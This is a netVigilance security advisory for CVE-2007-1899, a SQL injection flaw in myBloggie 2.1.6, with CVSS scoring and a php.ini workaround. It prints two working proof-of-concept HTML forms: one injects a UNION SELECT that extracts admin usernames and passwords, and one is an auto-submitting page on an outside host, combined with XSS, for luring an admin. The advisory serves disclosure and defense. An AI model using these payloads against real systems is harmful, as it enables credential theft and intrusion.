CVE Logo

 

 

 

Best Security Research

 »  netVigilance is an active contributor to nvd.nist.gov
 
 » Every vulnerability in our database is independently scored according to CVSS 2.0
 
 » Our Scoring is compared to nvd.nist.gov and inconsistencies are reported to the NVD team at NIST
 
 »

netVigilance is responsible for more than 400 changes to the National Vulnerability Database - more than anyone else.
 

 » Our Professional Services team will validate any vulnerability Scoring for you.
 
netVigilance Security Advisory
 
 
 
myBloggie version 2.1.6 Multiple
 
SQL Injection Vulnerability
*

Fact: More than 15 vulnerabilities were discovered EVERY day of 2009

Description:

myBloggie is considered one of the most simple, user-friendliest yet packed with features Weblog system available to date. Built using PHP & mySQL, web most popular scripting language & database system enable myBloggie to be installed in any webservers.

A security problem in the product allows attackers to commit SQL injection.

External References:
Mitre CVE: CVE-2007-1899
NVD NIST: CVE-2007-1899


Summary:
myBloggie is weblog system built using PHP & mySQL, the webs most popular scripting language & database system which enable myBloggie to be installed in any webserver.

Successful exploitation requires PHP magic_quotes_gpc set to Off and register_globals set to "On".

Release Date:
June 30 2008

Severity:
Risk: Medium

Access Vector: Network
Access Complexity: High
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
CVSS Base Score: 5.1

Target Distribution on Internet: Low

Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated

Vulnerability Impact: Attack
Host Impact: SQL Injection


SecureScout Testcase ID:
TC 17969

Vulnerable Systems:
myBloggie version 2.1.6

Vulnerability Type:
SQL injection allows malicious people to execute their own SQL scripts. This could be exploited to obtain sensitive data, modify database contents or acquire administrator's privileges.

Vendor:
myWebland

Vendor Status:
The Vendor has been notified April 9th 2007, but did not respond.

Workaround:
In the php.ini file set magic_quotes_gpc = On and/or register_globals=Off

Example:

SQL Injection Vulnerability 1:

Create html file with the next content:
<html>
<body>
<form action="http://[TARGET]/[MYBLOGGIE-DIRECTORY]/index.php?mode=viewuser" method="POST">
<input type="submit" name="user_id" value="1 #' UNION SELECT CONCAT(`mb_user`.`user`,' -> ',`mb_user`.`password`),1,1,1,1,1,1,1,1,1 FROM `mb_user` /*">
</form>
</body>
</html>

REQUEST:
Browse this file and click on the button
REPLY:
<tr><td colspan="3" class="spacer6"></td></tr>
<tr><td></td><td></td><td align="right">
<span class="f10pxgrey">Category : <a class="std" href="?mode=viewcat&cat_id=1">
[SQL INJECTION RESULT - ADMIN NAME] -> [SQL INJECTION RESULT - ADMIN PASSWORD]</a>
Posted By : <b>1</b> | <img src="./templates/aura/images/comment.gif" alt="" />
<a class="std" href="?mode=viewid&post_id=1">Comments</a>[1] |
<img src="./templates/aura/images/trackback.gif" />

SQL Injection Vulnerability 2:

(SQL Injection + XSS Attack Vulnerability)

Create html file with the next content and place it for example on http://somedomain.com/file.html:
<html>
<body onLoad="document.forms(0).submit();">
<form action=" http://[TARGET]/[MYBLOGGIE-DIRECTORY]/admin.php?mode=edit" method="POST"> <input type="hidden" name="post_id" value="-1' UNION SELECT 1,2, CONCAT(`mb_user`.`user`,' -> ', `mb_user`.`password`), '</textarea><script>alert(document.post.subject.value)</script>', 5,6,7 FROM `mb_user`#">
</form>
</body>
</html>
REQUEST:
Induce a Mybloggie admin to browse the malicious page.
http://somedomain.com/file.html

REPLY:
Page containing username and password for Mybloggie admin account.



Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com


back to Security Advisories 
 

Copyright©2004-2011,  netVigilance, Inc.   All rights reserved  • Privacy Policy

netVigilance©